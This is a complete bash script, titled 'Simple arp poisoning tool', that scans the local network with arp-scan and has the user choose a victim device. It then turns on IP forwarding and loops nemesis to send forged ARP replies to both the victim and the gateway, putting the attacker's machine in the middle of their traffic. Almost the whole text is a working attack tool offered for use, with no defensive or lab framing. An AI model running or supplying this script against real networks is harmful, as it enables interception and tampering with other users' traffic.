Simple arp poisoning tool

arp-poison.sh

#!/bin/bash
DATA_DIR=".poison_result"
DEVICES_FILE="$DATA_DIR/device-list.txt"
NEMESIS_LOGFILE="$DATA_DIR/nemesis_log.txt"

IP_REGEX="[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}"
MAC_REGEX="[a-z0-9]\{2\}\:[a-z0-9]\{2\}\:[a-z0-9]\{2\}\:[a-z0-9]\{2\}\:[a-z0-9]\{2\}\:[a-z0-9]\{2\}"


if [ ! -d "$DATA_DIR" ]; then 
	mkdir $DATA_DIR 
fi
echo "" > $DEVICES_FILE

GATE_IP=$(ping -c 1 -w 1 gateway | grep -o $IP_REGEX | head -n 1)
GATE_MAC=""
echo ""
echo ""
echo "   ~~ WELCOME ~~"
echo ""
echo "   ~~ NOW ENABLING IP FORWARDING IN THE KERNEL ~~"
echo ""
echo ""

sudo su -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
function printDevices 
{
	echo "" 
	echo ""
	echo "  ==========================================="
	echo " 	               ~ DEVICES ~"
	echo "  ==========================================="
	echo ""

	local index=0
	while read DEVICE
	do
		((index+=1))
		echo "    <$index>   $DEVICE"
		echo ""
	done < $DEVICES_FILE		
}

echo "" 
echo ""
echo "  ==========================================="
echo "                ~ SCANNING ~"
echo "  ==========================================="
echo ""

#RUN ARP SCAN
OUTPUT=$(sudo arp-scan --interface=wlp3s0 --localnet | grep '^[0-9]\{1,3\}\.')

#SPLIT EACH LINE
OLD_IFS=$IFS
IFS=$'\n' DEVICE_LINES=($OUTPUT)
IFS=$OLD_IFS	

#FOR EACH LINE
for DEVICE_LINE in "${DEVICE_LINES[@]}"
do 
	#DEVICE IS NOT IN LIST
	if ! grep -q "$DEVICE_LINE" $DEVICES_FILE; then			
		#DEVICE IS GATEWAY
		if  echo "$DEVICE_LINE" | grep "$IP_REGEX" | grep -q "$GATE_IP"; then		
			#AND GATE MAC ADDRES IS UNSET
			if  [ "$GATE_MAC" == "" ]; then
				echo "   [~~] FOUND BROADCAST:"
				echo "        $DEVICE_LINE"

				#ACQUIRE GATE MAC
				GATE_MAC=$(echo $DEVICE_LINE | grep -o "$MAC_REGEX")
				echo "        MAC ACQUIRED : $GATE_MAC"	
				echo ""
			fi
		#NORMAL DEVICE
		else			
			echo "   [::] FOUND DEVICE:"
			echo "        $DEVICE_LINE"
			echo ""

			#ADD DEVICE TO LIST
			echo "$DEVICE_LINE" >> $DEVICES_FILE					
		fi
	fi
done



#DISPLAY FOUND DEVICES
printDevices
MAX_DEVICES=$(cat $DEVICES_FILE | wc -l)

#LET USER CHOOSE DEVICE
echo "  Choose a device: [1-$MAX_DEVICES]"

#READ USER CHOICE
while read choice
do	
	#IF LEGAL CHOICE BREAK
	if [ $choice -gt 0 ] && [ $choice -le $MAX_DEVICES ]; then
		break;
	else 
		echo "  Invalid choice [MIN  = 1, MAX = $MAX_DEVICES]"
		echo ""
		echo "  Retry" 
		echo ""
		echo ""
		printDevices
	fi
done

#GET TARGET DEVICE
index=1
while read DEVICE
do
	if [ $index == $choice ]; then
		TARGET_DEVICE="$DEVICE"
		echo "   CHOOSEN: $DEVICE"
		break
	fi
	((index+=1))
done < $DEVICES_FILE	

#SETUP TARGET ADDRESS
TARGET_IP="$(echo $TARGET_DEVICE | grep -o $IP_REGEX)"
TARGET_MAC="$(echo $TARGET_DEVICE | grep -o $MAC_REGEX)"

#SETUP LOCAL ADDRESS
MY_MAC="$(ifconfig wlp3s0 | grep "ether\s" | grep -o $MAC_REGEX)"
MY_IP="$(ifconfig wlp3s0 | grep "inet\s" | grep -o $IP_REGEX | head -n 1)"

echo ""
echo ""
echo "=== ACQUIRED DATA ======================="
echo ""
echo " TARGET DEVICE: $TARGET_DEVICE"
echo ""
echo ""
echo "    GATE IP: $GATE_IP"
echo "    GATE MAC: $GATE_MAC"
echo ""
echo ""
echo "    TARGET IP: $TARGET_IP"
echo "    TARGET MAC: $TARGET_MAC"
echo ""
echo ""
echo "    YOUR IP: $MY_IP"
echo "    YOUR MAC: $MY_MAC"
echo ""
echo "===== CONTINUE??? [y/n] ================="
while read yesNo
do
	if [ "$yesNo" == "y" ]; then
		break
	elif [ "$yesNo" == "n" ]; then
		echo "Quitting..."
		exit
	else 
		echo "Enter y or n"
	fi
done

#run nemesis
while : 
do 
#from machine to gateway
sudo nemesis arp -v -r -d wlp3s0 -S $TARGET_IP -D $GATE_IP -h $MY_MAC -m $GATE_MAC -H $MY_MAC -M  $GATE_MAC >> $NEMESIS_LOGFILE
#from gateway to machine
sudo nemesis arp -v -r -d wlp3s0 -S $GATE_IP -D $TARGET_IP -h $MY_MAC -m $TARGET_MAC -H $MY_MAC -M $TARGET_MAC >> $NEMESIS_LOGFILE
echo "POISONING $TARGET_IP, SEE LOG -> $NEMESIS_LOGFILE"
sleep 5
done